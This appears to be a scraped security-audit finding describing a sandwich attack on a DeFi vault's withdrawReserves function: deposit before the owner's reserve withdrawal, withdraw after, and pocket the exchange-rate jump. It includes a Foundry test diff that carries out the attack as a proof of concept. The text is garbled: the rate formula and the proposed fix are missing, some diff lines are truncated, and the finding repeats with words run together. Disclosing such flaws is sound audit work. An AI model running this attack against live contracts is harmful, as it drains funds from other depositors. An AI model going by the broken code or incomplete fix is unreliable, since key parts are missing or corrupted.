User can perform sandwich attack on withdrawReserves for profit
A malicious user could listen to the mempool for calls to withdrawReserves, at which point they can perform a sandwich attack by calling userDeposit before the withdraw reserves transaction and then userWithdraw after the withdraw reserves transaction. They can accomplish this using a tool like flashbots and make an instantaneous profit due to changes in exchange rates.
Vulnerability Detail
When a user deposits or withdraws from the vault, the exchange rate of the token is calculated between the token itself and its dToken. As specified in an inline comment, the exchange rate is calculated like so:
where reserves = info.totalReserves - info.withdrawnReserves. When the owner of the vault calls withdrawReserves the withdrawnReserves value increases, so the numerator of the above formula increases, and thus the exchange rate increases. An increase in exchange rate means that the same number of dTokens is now worth more of the underlying ERC20.
Below is a diff to the existing test suite that demonstrates the sandwich attack in action:
diff --git a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol
index a699162..337d1f5 100644
--- a/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol
+++ b/new-dodo-v3/test/DODOV3MM/D3Vault/D3Vault.t.sol
@@ -233,6 +233,47 @@ contract D3VaultTest is TestContext {
assertEq(d3Vault.getTotalDebtValue(address(d3MM)), 1300 ether);
+ function testWithdrawReservesSandwichAttack() public {
+ // Get dToken
+ (address dToken2,,,,,,,,,,) = d3Vault.getAssetInfo(address(token2));
+ // Approve tokens
+ vm.prank(user1);
+ token2.approve(address(dodoApprove), type(uint256).max);
+ vm.prank(user2);
+ token2.approve(address(dodoApprove), type(uint256).max);
+ vm.prank(user2);
+ D3Token(dToken2).approve(address(dodoApprove), type(uint256).max);
+ // Set user quotas and mint tokens
+ mockUserQuota.setUserQuota(user1, address(token2), 1000 ether);
+ mockUserQuota.setUserQuota(user2, address(token2), 1000 ether);
+, 1000 ether);
+, 1000 ether);
+ // User 1 deposits to allow pool to borrow
+ vm.prank(user1);
+ d3Proxy.userDeposit(user1, address(token2), 500 ether);
+, 100 ether);
+ poolBorrow(address(d3MM), address(token2), 100 ether);
+ vm.warp(365 days + 1);
+ // Accrue interest from pool borrow
+ d3Vault.accrueInterest(address(token2));
+ uint256 reserves = d3Vault.getReservesInVault(address(token2));
+ // User 2 performs a sandwich attack on the withdrawReserves call to make a profit
+ vm.prank(user2);
+ d3Proxy.userDeposit(user2, address(token2), 100 ether);
+ vm.prank(vaultOwner);
+ d3Vault.withdrawReserves(address(token2), reserves);
+ uint256 dTokenBalance = D3Token(dToken2).balanceOf(user2);
+ vm.prank(user2);
+ d3Proxy.userWithdraw(user2, address(token2), dToken2, dTokenBalance);
+ assertGt(token2.balanceOf(user2), 1000 ether);
+ }
function testWithdrawReserves() public {
token2.approve(address(dodoApprove), type(uint256).max);
An attacker can perform a sandwich attack on calls to withdrawReserves to make an instantaneous profit from the protocol. This effectively steals funds away from other legitimate users of the protocol.
There are a couple of ways this type of attack could be prevented:
User deposits could have a minimum lock time in the protocol to prevent an immediate withdraw. However the downside is the user will still profit in the same manner due to the fluctuation in exchange rates.
Increasing reserves whilst accruing interest could have an equal and opposite decrease in token balance accounting. Every time reserves increase you are effectively taking token value out of the vault and "reserving" it for the protocol. Given the borrow rate is higher than the reserve increase rate, the exchange rate will continue to increase. I think something like the following would work (please note I haven't tested this):
User can perform sandwich attack on withdrawReserves for profit
A malicious user could listen to the mempool for calls to
, at which point they can perform a sandwich attack by callinguserDeposit
before the withdraw reserves transaction and thenuserWithdraw
after the withdraw reserves transaction. They can accomplish this using a tool like flashbots and make an instantaneous profit due to changes in exchange rates.Vulnerability Detail
When a user deposits or withdraws from the vault, the exchange rate of the token is calculated between the token itself and its dToken. As specified in an inline comment, the exchange rate is calculated like so:
reserves = info.totalReserves - info.withdrawnReserves
. When the owner of the vault callswithdrawReserves
the withdrawnReserves value increases, so the numerator of the above formula increases, and thus the exchange rate increases. An increase in exchange rate means that the same number of dTokens is now worth more of the underlying ERC20.Below is a diff to the existing test suite that demonstrates the sandwich attack in action:
An attacker can perform a sandwich attack on calls to
to make an instantaneous profit from the protocol. This effectively steals funds away from other legitimate users of the protocol.Code Snippet
Tool used
Manual Review
There are a couple of ways this type of attack could be prevented: